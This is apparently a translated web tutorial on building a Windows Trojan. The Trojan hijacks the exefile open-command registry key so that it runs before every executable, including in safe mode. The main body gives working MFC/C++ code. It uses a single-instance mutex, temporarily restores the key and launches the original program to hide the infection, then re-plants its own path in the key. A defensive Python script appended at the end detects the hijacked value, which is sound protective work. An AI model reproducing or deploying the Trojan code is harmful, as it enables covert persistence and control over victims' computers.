The programming idea of file association type Trojan Horse

Source: Internet
Author: User
Tags: command line, safe mode, strlen

We know that, in general, a program that should start automatically has to be registered under

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

Because these locations are familiar to everyone, they are easy to find, and in Windows safe mode the programs listed there do not run at all. If our program is instead tied to a file association in the registry, the result is much better.

The value of HKEY_CLASSES_ROOT\exefile\shell\open\command is the command used to open executable (*.exe) files; by default it is "%1" %*.

If this value is changed to our Trojan program, every execution of an executable will run our program instead of the original one, so our Trojan starts. The work we have to do is this: our Trojan starts, then it executes the original program, so that to the average user it looks as if nothing has happened. All right, let's start building one.

- First, use VC to create a dialog-based program named Start.

In CStartDlg add a public member variable HANDLE hMutex; it prevents our Trojan from running more than once.

- Add the following code to CStartDlg::OnInitDialog():

CString str;
str.Format("%s", AfxGetApp()->m_lpCmdLine); // get the incoming command line arguments
const char *mutexObject = "MyStart";        // name of the mutex
hMutex = NULL;
hMutex = ::CreateMutex(NULL, FALSE, mutexObject);
if (hMutex != NULL)
{
    DWORD err = GetLastError();
    if (err == ERROR_ALREADY_EXISTS)
        ::PostQuitMessage(0); // the same program is already running, so exit
}
if (str != "")
{
    CString temp;
    char ch;
    int length = str.GetLength();
    for (int i = 0; i < length; i++)
    {
        ch = str.GetAt(i);
        if (ch == '\\')
            temp = temp + "\\\\";
        else
            temp = temp + ch;
    }
    temp = temp.Left(temp.GetLength() - 2);
    temp = temp.Mid(1);

The loop above changes every "\" in the string into "\\"; the two calls after it strip the surrounding quotes from the path.

    char str1[] = "\"%1\" %*";
    ::RegSetValue(HKEY_CLASSES_ROOT, "exefile\\shell\\open\\command",
                  REG_SZ, (LPCTSTR)str1, strlen(str1) + 1);

The registry value must be restored before the original program is executed; otherwise ShellExecute would simply run our Trojan program again.

    ShellExecute(NULL, "open", temp, NULL, NULL, SW_SHOW); // execute the original program
}

After the original program has been launched, change the registry value back to the Trojan program we want started:

TCHAR str2[256];
// get the full path name of our own program
GetModuleFileName(NULL, str2, 255);
strcat(str2, "\"%1\" %*");
::RegSetValue(HKEY_CLASSES_ROOT, "exefile\\shell\\open\\command",
              REG_SZ, (LPCTSTR)str2, strlen(str2) + 1);

From now on, as soon as any program runs, our Start program is executed first. Even in safe mode, running any executable runs our program.
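As an added defender's check, not part of the original article: a Python script that classifies the exefile open command and, on Windows, reads the live value through winreg. The sample values are constructed here; the only assumption is that the stock value is "%1" %*.

```python
"""Check whether HKCR\\exefile\\shell\\open\\command still holds the stock value."""
import re
from typing import Optional

# Stock Windows value for the exefile open command: "%1" %*
DEFAULT_EXEFILE_COMMAND = '"%1" %*'


def normalize_command(value: str) -> str:
    """Collapse whitespace so cosmetic differences do not hide a real change."""
    return re.sub(r"\s+", " ", value).strip()


def classify_exefile_command(value: str) -> str:
    """Return 'ok' for the stock value, 'hijacked' when a program has been
    prepended to "%1" %* (the shape the article produces), else 'modified'."""
    norm = normalize_command(value)
    if norm == DEFAULT_EXEFILE_COMMAND:
        return "ok"
    if norm.endswith(DEFAULT_EXEFILE_COMMAND):
        return "hijacked"
    return "modified"


def hijacker_path(value: str) -> Optional[str]:
    """Extract the program inserted in front of "%1" %*, or None if there is none."""
    norm = normalize_command(value)
    if classify_exefile_command(norm) != "hijacked":
        return None
    return norm[: -len(DEFAULT_EXEFILE_COMMAND)].strip().strip('"')


def read_live_value() -> Optional[str]:
    """Read the real key on Windows; returns None elsewhere (winreg is Windows-only)."""
    try:
        import winreg
    except ImportError:
        return None
    with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, r"exefile\shell\open\command") as key:
        value, _ = winreg.QueryValueEx(key, "")
    return value


# Constructed sample values, not taken from a real machine.
SAMPLES = {
    '"%1" %*': "ok",
    'C:\\Users\\x\\start.exe"%1" %*': "hijacked",  # shape produced by the strcat above
    '"C:\\Windows\\notepad.exe" "%1"': "modified",
}

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), "->", classify_exefile_command(sample), hijacker_path(sample))
    live = read_live_value()
    if live is not None:
        print("live value:", repr(live), "->", classify_exefile_command(live))
```

A value classified as anything but "ok" is worth investigating, since no legitimate software needs to change how every .exe is opened.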
